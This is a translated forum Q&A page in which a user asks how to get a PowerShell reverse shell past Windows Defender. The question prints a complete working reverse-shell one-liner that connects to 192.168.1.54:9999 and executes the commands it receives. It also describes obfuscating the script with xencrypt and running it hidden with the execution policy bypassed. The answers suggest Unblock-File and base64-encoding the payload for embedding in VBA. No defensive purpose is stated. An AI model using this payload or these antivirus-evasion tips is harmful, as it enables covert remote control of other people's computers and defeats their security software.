powershell 反向 shell AV規避
[英]powershell reverse shell AV evasion
問題描述
我正在嘗試在 windows 10 上運行 powershell 反向 shell。無論如何,每次它被 Wndows Defender 阻止。 我怎樣才能繞過它?
在一個文件中,我存儲了有效負載$client = New-Object System.Net.Sockets.TCPClient('192.168.1.54',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
然后我使用 xencrypt ( https://github.com/the-xentropy/xencrypt )來混淆代碼但是當我運行powershell -NoP -NonI -W Hidden -Exec Bypass.\revshell.ps1
我得到Questo script include contenuto dannoso ed è stato bloccato dal software antivirus. In riga:18 car:1 + IEX($piifnga) + ~~~~~~~~~~~~~ + CategoryInfo: ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId: ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand Questo script include contenuto dannoso ed è stato bloccato dal software antivirus. In riga:18 car:1 + IEX($piifnga) + ~~~~~~~~~~~~~ + CategoryInfo: ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId: ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
問題:有沒有辦法繞過這個檢查?
2 個解決方案
解決方案1
0 2021-02-22 15:40:00
在嘗試運行反向 shell 腳本之前,您是否嘗試過Unblock-File.\revshell.ps1 (了解與運行下載到機器上的不受信任代碼相關的風險)?
解決方案2
-1 2021-02-22 12:25:55
只需對其進行編碼,或者您可以將其更改為 base64 以將其嵌入到 vba
我如何使用 C 語言運行這一班輪 powershell 反向 shell
[英]How do i run this one liner powershell reverse shell using C Language
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.